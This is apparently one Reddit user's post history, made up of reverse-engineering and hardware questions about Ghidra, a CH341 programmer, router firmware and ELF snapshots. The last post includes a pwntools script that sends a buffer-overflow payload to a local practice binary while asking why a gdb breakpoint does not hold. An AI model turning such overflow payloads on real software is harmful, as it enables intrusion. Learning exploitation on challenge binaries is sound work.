u/FewMolasses7496

What do the function colours mean in Ghidra?

I've noticed when reading the decompile in Ghidra that lots of functions have different colours. I am wondering whether a certain colour means that the function is defined in a library or a certain colour means that the function is user made?

u/FewMolasses7496 — 9 days ago
▲ 1 r/archlinux+1 crossposts

I know this issue has been addressed in other posts, but none of the solutions that I have tried have worked and I am yet to find a post on any forum that has a solution for this issue on Arch Linux. I have tried checking the dmesg output and it is completely silent. I have loaded the ch341 module using modprobe ch341. I'm not sure what other troubleshooting steps I should take. If anyone knows how to fix this issue please kindly tell me.
Many thanks.

u/FewMolasses7496 — 20 days ago

This is the first time I've tried to read firmware from SPI flash, but there doesn't seem to be SPI flash on this model. I'm guessing this router model might use NAND flash or some other type, but again I'm new so I don't know this stuff. Does anyone know how I can read the firmware off of this device?

u/FewMolasses7496 — 22 days ago

Usually when I am reversing an encryption algorithm in Ghidra, I recreate it in C. That works most of the time but it is time consuming and you have to make sure everything is perfect. I am wondering if there is some way I can rip out the bare assembly instructions and run them separately instead of having to recreate the entire thing?

u/FewMolasses7496 — 25 days ago

I am thinking of saving the state of an ELF binary just to save me some time when reverse engineering, so if anyone knows any ways to do it on Linux please tell me. I also want to restore from the save that I have created. Many thanks.

u/FewMolasses7496 — 27 days ago
▲ 4 r/ExploitDev+1 crossposts

Pwntools has a feature where you can attach the gdb debugger to the process and execute commands. For some reason, it says it has stopped at a certain breakpoint when in reality it has gone further than that. I can tell because it prints text that shouldn't be printed if that breakpoint was enforced.
Here is my code:

from pwn import *
import time

context.terminal = ['alacritty', '-e']

payload_room_2 = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa".encode('ascii')
payload_room_2 = payload_room_2 + b"\xde\xca\xde\x42"
payload_room_2 = payload_room_2 + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa".encode('ascii')

context.log_level = 'debug'

def print_text(n):
        line = n.recv()
        print(line.decode())

n = process("./nullhaven")


n.send(b"\x31\x0a")

print_text(n)

n.send(b"\x3e\x3a\x4f\x74\x57\x37\x5d\x59\x65\x46\x3d\x79\x63\x28\x50\x6c\x5f\x73\x47\x69\x38\x60\x67\x50\x2a\x40\x23\x7e\x7c\x20\x5d\x79\x45\x54\x41\x47\x0f\xb0\x00\x00\x01\x3b\x71")

n.send("aaaaaaaaaaaaaaaaaaaaa".encode('ascii'))

print_text(n)

n.send(b"\x32\x0a")

n.send(payload_room_2)

gdb.attach(n, '''
           break *0x004030a3

           ''')

print_text(n)

while True:
    sleep(1)
u/FewMolasses7496 — 27 days ago